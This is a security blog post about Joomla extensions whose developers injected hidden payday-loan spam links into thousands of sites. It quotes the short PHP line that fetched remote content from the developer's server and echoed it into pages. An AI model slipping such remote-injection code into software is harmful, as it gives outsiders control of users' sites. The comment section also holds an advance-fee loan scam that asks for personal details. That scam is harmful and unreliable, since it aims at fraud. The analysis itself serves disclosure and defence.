When Good Plugins Go Bad – SEO Spam on Joomla Websites

April 10, 2013Daniel Cid

We recently published an article about an interesting case where a very popular WordPress Plugin (Social Media Widget), with more than 900,000 downloads, got sold and the new owners decided to use their big audience and inject spam on all the sites using the plugin.

If you read the post, you will see how they went about injecting those “pay day loan” SPAM links to paydaypam.co.uk. What’s even more scary is that in one day, the number of backlinks to paydaypam.co.uk, increased from 0 to almost 450k, according to ahrefs.com:

This gives you an idea of how big a targeted SEO Spam attack can be.

Spam SEO Attacks on Joomla sites

Unfortunately, this story is not new. One of our readers pointed us to a very similar case that happened in the Joomla ecosystem just a few weeks before. In similar fashion, the campaign was able to infiltrate more than 20,000 sites. The developers involved were from many popular Joomla extensions:

iNowWeb.com (author: Sharif Mamdouh):
– AddThis For Joomla!
– Share This for Joomla!
– iNowSlider (mod_iNowSlider)
– iNow Twitter Widget (mod_TwitterWidget)
– BrainyQuote for Joomla! (mod_JoomlaBrainyQuote)
– Quotes By keyWord! (mod_JoomlaQuotes)
– iNow Wikio (mod_JoomlaWikio)
– iNow Twitter (mod_TwitterForJoomla)
– QuickJump for Joomla! (mod_quickjump)

Autson.com (author: xing):
– VirtueMart Advanced Search
– Skitter Slideshow
– FaceBook Slider
– Twitter Friends & Followers
– Flying Tweets
– Autson Twitter Search
– Twitter Quote
– FaceBook Show

Plimun.com:
– Plimun Twitter Ticker
– Twitter Show
– Nivo Slider

These guys tried to leverage their user base to inject the same type of SPAM seo (pay day loans) into any site running their extension[s]. In this case, the hidden backlinks were being called from:

$credit=file_get_contents("httx://www.inowweb. com/p.php?i=".$path);
echo $credit;

This allowed the extension developers to control and choose what to be displayed on any site using their software. The Joomla security team also reacted fast and banned these developers and their associated extensions.

Restricting the usage of Extensions

We have been talking about this for a while, but it is important to repeat. Limit your usage of extensions (or plugins), along with all other third party components, and only use from trusted sources. More importantly, only if you need the said functionality. The less plugins you have configured in your environment, the less chances you have to be caught in a similar situation. The last thing you want is to become part of a SPAM botnet.

If you are unsure if your site is showing those spammy keywords, you can scan it for free here: http://sitecheck.sucuri.net

About Daniel Cid

Daniel B. Cid is the Founder & CTO of Sucuri and also the founder of the open source project - OSSEC HIDS. His interests range from intrusion detection, log analysis (log-based intrusion detection), web-based malware research and secure development. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Viktor Nagornyy

Thanks Daniel, great post. Were you able to find out how they were able to inject spam links into the social media widget plugin? One of our sites (monitored by Sucuri) had it installed and we did not upgrade it in a while, yet yesterday Sucuri picked it up. Or was it the case of you learning about it and adding to your database? Thanks.
akash malik

Great post Daniel- It would be awesome if you keep us regularly updated on such issues by 3rd party plugins for Joomla & wordpress as we have lots of sites built using these 2 platforms. Akash | Facebook Apps | Apps Mav
Bret Londo

i think it is a third party plugins, by the way thanks for your great post Daniel WordPress is pretty much set up for seo.
John P

I found your site by searching on the trash that gets inserted on victims’ websites, which I’ve seen a couple of times lately, and the explanation was interesting to read. The reason I saw this effect in a couple of places was that I typically run my browser with JavaScript turned off, and when that’s the case, a visitor to the affected sites does see the hidden material.
hopy

I am very much thanks to this website for proving the nice
technology and for the information is also very great I am very much satisfied
to this technology. You are very like this information and I am defiantly shore
about that.
Zach Smith

Thanks for publishing another great article for us. This is best for any technology related blog.
MelindaFeedingFashion

My site has been attacked, I’ve had 848k comments on the one blog post I have sitting there. I’m not even actively using the blog. I am such a beginner here and can’t afford to pay IT people… Trying to figure out how to disable comments from the posts and hoping that will fix the problem, my host has shut down my site for excessive usage… Hope I am on the right track, struggling to find the clear info I need? If you know where I can get a clear how to, that would be great (I find the joomla help site so overwhelming but guess that’s where to look… Thanks
easy

Do you need a Loan?
Are you looking for Finance?
Are you looking for a Loan to enlarge your business?
I think you have come to the right place.
We offer Loans atlow interest rate.
Interested people should please contact us on
For immediate response to your application, Kindly
reply to this emails below only.
(easyloanoffer1@gmail.com)

Please, do provide us with the Following information if interested.
1) Full Name:………
2) Gender:………
3) Loan Amount Needed:………
4) Loan Duration:………
5) Country:………
6) Home Address:………
7) Mobile Number:………
8)Monthly Income:…………………
9)Occupation:………………………
)Which site did you here about us…………………
Thanks and Best Regards.
(easyloanoffer1@gmail.com)

www.(easyloanoffer1@gmail.com)